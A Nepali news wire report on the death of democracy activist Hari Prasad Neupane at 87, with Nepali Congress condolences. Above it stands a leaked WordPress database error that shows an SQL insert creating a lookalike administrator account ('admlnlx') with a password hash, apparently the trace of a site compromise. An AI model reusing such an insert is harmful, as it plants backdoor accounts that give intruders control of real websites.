WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMBvLhQ1pHdnfdm58wad55GS.kS7GT1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:10:37', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ २ –
नेपालको लोकतान्त्रिक आन्दोलनका अथक योद्धा हरिप्रसाद न्यौपानेको ८७ वर्षको उमेरमा आज राजधानीमा निधन भयो ।
प्रजातान्त्रिक आन्दोलनमा २००७ सालदेखि सक्रिय नेता न्यौपानेले तनहुँ जिल्लाबाट लोकतान्त्रिक आन्दोलनको नेतृत्व गर्नुभएको थियो ।
तनहुँको ब्यास नगरपालिकाका स्थायी बासिन्दा न्यौपानेको निधनप्रति नेपाली काँग्रेसले गहिरो दुःख व्यक्त गर्दै शोकाकुल परिवारजनमा हार्दिक समवेदना प्रकट गरेको छ ।
पार्टी सभापति शेरबहादुर देउवाले आज एक शोक वक्तव्य जारी गरी नेता न्यौपानेको निधनबाट नेकालाई अपूरणीय क्षति भएको बताउनुभएको छ ।
स्वर्गीय न्यौपानेको आजै पशुपति आर्यघाटमा दाहसंस्कार गरियो । काँग्रेसका नेता रामचन्द्र पौडेललगायत सांसद, विभिन्न पार्टीका नेता तथा कार्यकर्ताले आर्यघाट पुगेर उहाँप्रति अन्तिम श्रद्धाञ्जलि अर्पण गर्नुभएको थियो । – रासस